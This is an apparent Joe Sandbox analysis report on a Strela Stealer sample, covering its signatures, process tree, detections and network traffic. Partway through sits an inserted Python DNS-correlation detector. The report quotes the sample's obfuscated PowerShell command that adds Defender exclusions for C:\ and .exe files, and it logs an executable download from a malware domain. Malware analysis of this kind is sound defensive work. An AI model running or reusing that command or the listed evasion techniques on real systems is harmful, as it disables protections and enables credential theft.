Windows Analysis Report
SecuriteInfo.com.FileRepMalware.23820.12149.exe

Overview

General Information

Sample name: SecuriteInfo.com.FileRepMalware.23820.12149.exe
Analysis ID: 1632299
MD5: c4e6239cad71853ac5330ab665187d9f
SHA1: 845e3aa5bf52c5eef683d98fb68f00fd6bb0f5c0
SHA256: 4ba27a9d19e6717ba3049c8a99a1127a431c5639121cff564f35711bea613745
Tags: exe, user-SecuriteInfoCom

Detection

Strela Stealer
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Generic Stealer
Yara detected Strela Stealer
.NET source code contains very large array initializations
Bypasses PowerShell execution policy
Creates a thread in another existing process (thread injection)
Creates multiple autostart registry keys
Drops large PE files
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Modifies the context of a thread in another process (thread injection)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Reads the Security eventlog
Reads the System eventlog
Sigma detected: Potential PowerShell Command Line Obfuscation
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • SecuriteInfo.com.FileRepMalware.23820.12149.exe (PID: 5044 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe" MD5: C4E6239CAD71853AC5330AB665187D9F)
    • powershell.exe (PID: 652 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionPath ([Char]67+[Char]58+[Char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionExtension 'exe'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 6584 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • a.exe (PID: 7908 cmdline: "C:\Users\user\AppData\Roaming\a.exe" MD5: 645A45D81803813EC953409B49468E69)
      • chrome.exe (PID: 8024 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-fre --no-default-browser-check --no-first-run --no-sandbox --allow-no-sandbox-job --disable-gpu --mute-audio --disable-audio --user-data-dir="C:\Users\user\AppData\Local\Temp\xizov5lf.xxi" MD5: E81F54E6C1129887AEA47E7D092680BF)
        • chrome.exe (PID: 1136 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mute-audio --user-data-dir="C:\Users\user\AppData\Local\Temp\xizov5lf.xxi" --no-pre-read-main-dll --field-trial-handle=2336,i,9433496215065290315,15168576315404753794,262144 --variations-seed-version --mojo-platform-channel-handle=2416 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
      • chrome.exe (PID: 8044 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\user\AppData\Local\Temp\xizov5lf.xxi /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\user\AppData\Local\Temp\xizov5lf.xxi\Crashpad --metrics-dir=C:\Users\user\AppData\Local\Temp\xizov5lf.xxi --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=134.0.6998.36 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffc9d1d4f38,0x7ffc9d1d4f44,0x7ffc9d1d4f50 MD5: E81F54E6C1129887AEA47E7D092680BF)
      • chrome.exe (PID: 3432 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --user-data-dir="C:\Users\user\AppData\Local\Temp\xizov5lf.xxi" --no-pre-read-main-dll --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=2336,i,9433496215065290315,15168576315404753794,262144 --variations-seed-version --mojo-platform-channel-handle=2332 /prefetch:2 MD5: E81F54E6C1129887AEA47E7D092680BF)
      • Gelelx.exe (PID: 9184 cmdline: "C:\Users\user\AppData\Local\Temp\Gelelx.exe" MD5: 5648BC0CB4AE58D07BB6C8789C560B1C)
        • Vhbyv.exe (PID: 3152 cmdline: "C:\Users\user\AppData\Local\Temp\Vhbyv.exe" MD5: 922D612E9A3CFEE599C708C68E10A512)
          • Vhbyv.exe (PID: 4032 cmdline: "C:\Users\user\AppData\Local\Temp\Vhbyv.exe" MD5: 922D612E9A3CFEE599C708C68E10A512)
        • Gelelx.exe (PID: 3148 cmdline: "C:\Users\user\AppData\Local\Temp\Gelelx.exe" MD5: 5648BC0CB4AE58D07BB6C8789C560B1C)
  • svchost.exe (PID: 7208 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • license.exe (PID: 2336 cmdline: "C:\Users\user\AppData\Roaming\license.exe" MD5: 795F83B492C7B77A2C9005144ECCE403)
    • license.exe (PID: 8336 cmdline: "C:\Users\user\AppData\Roaming\license.exe" MD5: 795F83B492C7B77A2C9005144ECCE403)
  • hosts.exe (PID: 8496 cmdline: "C:\Users\user\AppData\Roaming\hosts.exe" MD5: EB1CDECFD9970F668E64DFDBB2FB92C6)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000010.00000002.2093956050.00000000059F0000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
00000010.00000002.1993362818.00000000033C1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
0000000D.00000002.1487750911.0000020D463C5000.00000004.00000001.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
0000000B.00000002.1787672422.00000000031E1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
0000000B.00000002.1825728911.0000000005910000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |

Source | Rule | Description | Author | Strings
11.2.a.exe.5910000.5.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
16.2.Gelelx.exe.59f0000.2.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
16.2.Gelelx.exe.59f0000.2.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
21.2.license.exe.4435630.2.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
21.2.license.exe.41706c8.6.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |

System Summary

Source: Process started; Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionPath ([Char]67+[Char]58+[Char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionExtension 'exe'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionPath ([Char]67+[Char]58+[Char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionExtension 'exe'", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe, ParentProcessId: 5044, ParentProcessName: SecuriteInfo.com.FileRepMalware.23820.12149.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionPath ([Char]67+[Char]58+[Char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionExtension 'exe'", ProcessId: 652, ProcessName: powershell.exe
Source: Process started; Author: frack113; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionPath ([Char]67+[Char]58+[Char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionExtension 'exe'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionPath ([Char]67+[Char]58+[Char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionExtension 'exe'", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe, ParentProcessId: 5044, ParentProcessName: SecuriteInfo.com.FileRepMalware.23820.12149.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionPath ([Char]67+[Char]58+[Char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionExtension 'exe'", ProcessId: 652, ProcessName: powershell.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: C:\Users\user\AppData\Roaming\license.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\Gelelx.exe, ProcessId: 9184, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\license
Source: File created; Author: Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe, ProcessId: 5044, TargetFilename: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c1l2zyuj.o2o.ps1
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionPath ([Char]67+[Char]58+[Char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionExtension 'exe'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionPath ([Char]67+[Char]58+[Char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionExtension 'exe'", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe, ParentProcessId: 5044, ParentProcessName: SecuriteInfo.com.FileRepMalware.23820.12149.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionPath ([Char]67+[Char]58+[Char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionExtension 'exe'", ProcessId: 652, ProcessName: powershell.exe
Source: Process started; Author: vburov; Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7208, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-07T21:57:03.362111+0100 | 1810003 | 2 | Potentially Bad Traffic | 185.170.144.38 | 80 | 192.168.2.4 | 49714 | TCP
2025-03-07T21:57:03.362105+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49714 | 185.170.144.38 | 80 | TCP

AV Detection

Source: http://poolfreshstep.com; Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Roaming\license.exe; Avira: detection malicious, Label: HEUR/AGEN.1340047
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe; Avira: detection malicious, Label: TR/AD.Nekark.slcke
Source: C:\Users\user\AppData\Roaming\a.exe; Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe; Avira: detection malicious, Label: HEUR/AGEN.1326414
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe; ReversingLabs: Detection: 66%
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe; ReversingLabs: Detection: 66%
Source: C:\Users\user\AppData\Roaming\a.exe; ReversingLabs: Detection: 55%
Source: SecuriteInfo.com.FileRepMalware.23820.12149.exe; Virustotal: Detection: 16%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: SecuriteInfo.com.FileRepMalware.23820.12149.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown; HTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.4:49717 version: TLS 1.2
Source: SecuriteInfo.com.FileRepMalware.23820.12149.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\Administrator\Desktop\2023CryptsDone\WinFormProject-master\obj\Debug\Aml.pdb; source: SecuriteInfo.com.FileRepMalware.23820.12149.exe, 00000000.00000000.1141870986.0000000000F52000.00000002.00000001.01000000.00000003.sdmp, a.exe, 0000000B.00000002.1787672422.00000000035FA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq; source: a.exe, 0000000B.00000002.1830473060.0000000005940000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: chrome_elf.dll.pdb; source: chrome.exe, 0000000D.00000000.1383267169.00007FFC9D18F000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: protobuf-net.pdb; source: a.exe, 0000000B.00000002.1830473060.0000000005940000.00000004.08000000.00040000.00000000.sdmp
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe; Code function: 4x nop then jmp 03331599h (16_2_03331734)
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe; Code function: 4x nop then jmp 03331599h (16_2_03331538)
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe; Code function: 4x nop then jmp 03331599h (16_2_03331528)
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe; Code function: 4x nop then jmp 03336B04h (16_2_03336AC7)
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe; Code function: 4x nop then jmp 03336B04h (16_2_033369E8)
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe; Code function: 4x nop then jmp 03336B04h (16_2_033369D8)
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe; Code function: 4x nop then jmp 03330E81h (16_2_03330E00)
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe; Code function: 4x nop then jmp 03330E81h (16_2_03330DF1)
Source: C:\Users\user\AppData\Roaming\license.exe; Code function: 4x nop then jmp 02BB1599h (21_2_02BB1734)
Source: C:\Users\user\AppData\Roaming\license.exe; Code function: 4x nop then jmp 02BB1599h (21_2_02BB1538)
Source: C:\Users\user\AppData\Roaming\license.exe; Code function: 4x nop then jmp 02BB1599h (21_2_02BB152B)
Source: C:\Users\user\AppData\Roaming\license.exe; Code function: 4x nop then jmp 02BB6B04h (21_2_02BB6AC7)
Source: C:\Users\user\AppData\Roaming\license.exe; Code function: 4x nop then jmp 02BB6B04h (21_2_02BB69E8)
Source: C:\Users\user\AppData\Roaming\license.exe; Code function: 4x nop then jmp 02BB6B04h (21_2_02BB69D8)
Source: C:\Users\user\AppData\Roaming\license.exe; Code function: 4x nop then jmp 02BB0E81h (21_2_02BB0E00)
Source: C:\Users\user\AppData\Roaming\license.exe; Code function: 4x nop then jmp 02BB0E81h (21_2_02BB0DF1)
Source: chrome.exe; Memory has grown: Private usage: 1MB later: 63MB
Source: global traffic; TCP traffic: 192.168.2.4:49720 -> 111.90.145.132:7798
Source: global traffic; TCP traffic: 192.168.2.4:49750 -> 196.251.69.16:39001
Source: global traffic; HTTP traffic detected: HTTP/1.1 200 OK; Server: nginx/1.18.0 (Ubuntu); Date: Fri, 07 Mar 2025 20:57:03 GMT; Content-Type: application/octet-stream; Content-Length: 369152; Last-Modified: Thu, 20 Feb 2025 13:20:07 GMT; Connection: keep-alive; ETag: "67b72c07-5a200"; Accept-Ranges: bytes
Source: global traffic; HTTP traffic detected: HTTP/1.1 200 OK; Server: nginx/1.18.0 (Ubuntu); Date: Fri, 07 Mar 2025 20:57:29 GMT; Content-Type: application/octet-stream; Content-Length: 6461440; Last-Modified: Thu, 10 Oct 2024 19:55:52 GMT; Connection: keep-alive; ETag: "67083148-629800"; Accept-Ranges: bytes
Source: global traffic; HTTP traffic detected: GET /sfold/Kcjfkhnqcns.exe HTTP/1.1; Host: poolfreshstep.com; Connection: Keep-Alive
Source: Joe Sandbox View; IP Address: 111.90.145.132
Source: Joe Sandbox View; JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Network traffic; Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49714 -> 185.170.144.38:80
Source: Network traffic; Suricata IDS: 1810003 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP PE File Download : 185.170.144.38:80 -> 192.168.2.4:49714
Source: unknown; TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown; TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown; TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown; TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown; TCP traffic detected without corresponding DNS query: 142.250.185.195
                      Source: unknownTCP traffic detected without corresponding DNS query: 142.250.185.195
                      Source: unknownTCP traffic detected without corresponding DNS query: 52.113.196.254
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
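The "traffic without corresponding DNS query" finding above is a simple ordering check: a connection is flagged when its destination address was never returned in a DNS answer seen earlier in the capture. The block below is an added example of that check and is not part of the Joe Sandbox report or its engine. The event list is constructed: it mixes destination addresses visible on this page with two documentation-range placeholders (203.0.113.10 and 203.0.113.20) that the example pretends verifycleansecurity.com and poolfreshstep.com resolved to; the real answers are not on the page. The check is a heuristic: cached resolver answers, hosts-file entries and DNS-over-HTTPS all produce connections with no visible DNS query, so a hit means "review", not "hard-coded C2".

```python
"""Flag connections whose destination never appeared in a DNS answer.

Added example (not the sandbox's own logic). EVENTS is constructed sample data;
the 203.0.113.x addresses are documentation-range placeholders, not real
resolutions of the domains named here.
"""
from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class Event:
    ts: float            # seconds since capture start
    kind: str            # "dns", "tcp" or "udp"
    name: str = ""       # queried name (dns only)
    answers: tuple = ()  # A/AAAA records returned (dns only)
    dst: str = ""        # destination IP (tcp/udp only)


# Constructed sample capture. The PTR query for 59.60.14.0.in-addr.arpa mirrors
# the reverse lookup listed on the page; it answers with a name, not an IP, so it
# resolves nothing. The connect to 203.0.113.20 at t=1.15 happens BEFORE its DNS
# answer at t=1.20, which is exactly the pattern the check is meant to catch.
EVENTS = [
    Event(0.10, "dns", name="verifycleansecurity.com", answers=("203.0.113.10",)),
    Event(0.12, "tcp", dst="203.0.113.10"),
    Event(0.50, "tcp", dst="204.79.197.203"),
    Event(0.51, "tcp", dst="204.79.197.203"),
    Event(0.90, "udp", dst="1.1.1.1"),
    Event(0.95, "dns", name="59.60.14.0.in-addr.arpa", answers=()),
    Event(1.15, "tcp", dst="203.0.113.20"),
    Event(1.20, "dns", name="poolfreshstep.com", answers=("203.0.113.20",)),
    Event(1.25, "tcp", dst="203.0.113.20"),
    Event(2.00, "tcp", dst="131.253.33.254"),
]


def unresolved_connections(events):
    """Return Counter of (proto, dst) for connections made to an IP that no
    earlier DNS answer in the capture had returned.

    Events are processed in timestamp order, so an answer that arrives after
    the connection does not excuse it.
    """
    resolved = set()
    hits = Counter()
    for ev in sorted(events, key=lambda e: e.ts):
        if ev.kind == "dns":
            # Reverse (PTR) lookups return names, never addresses.
            if not ev.name.endswith(".in-addr.arpa"):
                resolved.update(ev.answers)
        elif ev.dst not in resolved:
            hits[(ev.kind, ev.dst)] += 1
    return hits


if __name__ == "__main__":
    for (proto, dst), n in unresolved_connections(EVENTS).items():
        print(f"{proto.upper()} traffic without corresponding DNS query: {dst} ({n})")
```

Run stand-alone it prints one line per flagged destination with its count, the same shape as the report entries above. Sorting by timestamp is the part worth keeping when adapting this to a real pcap: without it, a late DNS answer would silently clear an earlier hard-coded connect.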
Source: global traffic | HTTP traffic detected:
    GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1
    Host: www.google.com
    Connection: keep-alive
    X-Client-Data: CMiSywE=
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: empty
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    Accept-Encoding: gzip, deflate, br, zstd
    Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Source: global traffic | HTTP traffic detected:
    GET /async/ddljson?async=ntp:2 HTTP/1.1
    Host: www.google.com
    Connection: keep-alive
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: empty
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    Accept-Encoding: gzip, deflate, br, zstd
    Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Source: global traffic | HTTP traffic detected:
    GET /async/newtab_ogb?hl=en-GB&async=fixed:0 HTTP/1.1
    Host: www.google.com
    Connection: keep-alive
    X-Client-Data: CMiSywE=
    Sec-Fetch-Site: cross-site
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: empty
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    Accept-Encoding: gzip, deflate, br, zstd
    Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Source: global traffic | HTTP traffic detected:
    GET /async/newtab_promos HTTP/1.1
    Host: www.google.com
    Connection: keep-alive
    Sec-Fetch-Site: cross-site
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: empty
    Sec-Fetch-Storage-Access: active
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    Accept-Encoding: gzip, deflate, br, zstd
    Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Source: global traffic | HTTP traffic detected:
